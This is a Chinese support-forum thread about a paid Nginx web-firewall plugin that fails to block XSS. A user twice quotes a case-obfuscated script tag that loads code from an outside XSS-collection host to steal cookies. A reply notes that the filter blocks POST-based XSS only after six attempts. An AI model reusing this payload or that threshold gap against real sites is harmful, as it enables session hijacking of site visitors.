当前位置:论坛首页 > Linux面板 > 求助

【已解答】xss防御失效

发表在 Linux面板2021-3-16 18:41 [复制链接] 10 3274

Nginx防火墙 7.3官方有效防止sql注入/xss/一句话木马等常见渗透攻击,当前仅支持nginx,


购买了这个产品  xss攻击没有生效
使用道具 举报 只看该作者 回复
发表于 2021-3-16 19:29:38 | 显示全部楼层
您好,先更新防火墙至最新,目前最新版本为8.8.4版本
您是如何判断攻击没有生效的呢?
使用道具 举报 回复 支持 反对
发表于 2021-3-17 10:47:12 | 显示全部楼层
通过三方平台自己测试的 <sCRiPt sRC=//www.p1p.tw/O1G7></sCrIpT> 这种格式的xss注入,还是能盗取到cookie
使用道具 举报 回复 支持 反对
发表于 2021-3-17 10:49:38 | 显示全部楼层
nginx防火墙能直接更新么,我担心会影响到线上啊
使用道具 举报 回复 支持 反对
发表于 2021-3-18 09:28:49 | 显示全部楼层
能不能 回复下 一天了!!!!!!!!!!!!!!
使用道具 举报 回复 支持 反对
发表于 2021-3-18 09:40:12 | 显示全部楼层
宝塔用户_rfqfsh 发表于 2021-3-18 09:28
能不能 回复下 一天了!!!!!!!!!!!!!!

我这边测试XSS攻击,是可以正常防护的。你需要将你nginx防火墙版本升级到最新使用。
另外nginx防火墙升级不会有其他影响的
使用道具 举报 回复 支持 反对
发表于 2021-3-18 09:47:33 | 显示全部楼层
更新需要多久,大概知道么
使用道具 举报 回复 支持 反对
发表于 2021-3-18 09:58:31 | 显示全部楼层
<sCRiPt sRC=//www.p1p.tw/O1G7></sCrIpT>  自己传参 模拟,页面展示的时候 还是不行,没有过滤掉。
使用道具 举报 回复 支持 反对
发表于 2021-3-18 09:59:45 | 显示全部楼层
防火墙 已经更新到最新了
使用道具 举报 回复 支持 反对
发表于 2021-3-18 10:30:13 | 显示全部楼层
默认XSS 只会GET的方式拦截。
POST 是超过触发6次XSS 之后。才会拦截。
使用道具 举报 回复 支持 反对
发表于 2021-3-18 10:30:29 | 显示全部楼层
微信截图_20210318103020.png
使用道具 举报 回复 支持 反对
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

普通问题处理

论坛响应时间:72小时

问题处理方式:排队(仅解答)

工作时间:白班:9:00 - 18:00

紧急运维服务

响应时间:3分钟

问题处理方式:宝塔专家1对1服务

工作时间:工作日:9:00 - 18:30

宝塔专业团队为您解决服务器疑难问题

点击联系技术免费分析

工作时间:09:00至18:30

快速回复 返回顶部 返回列表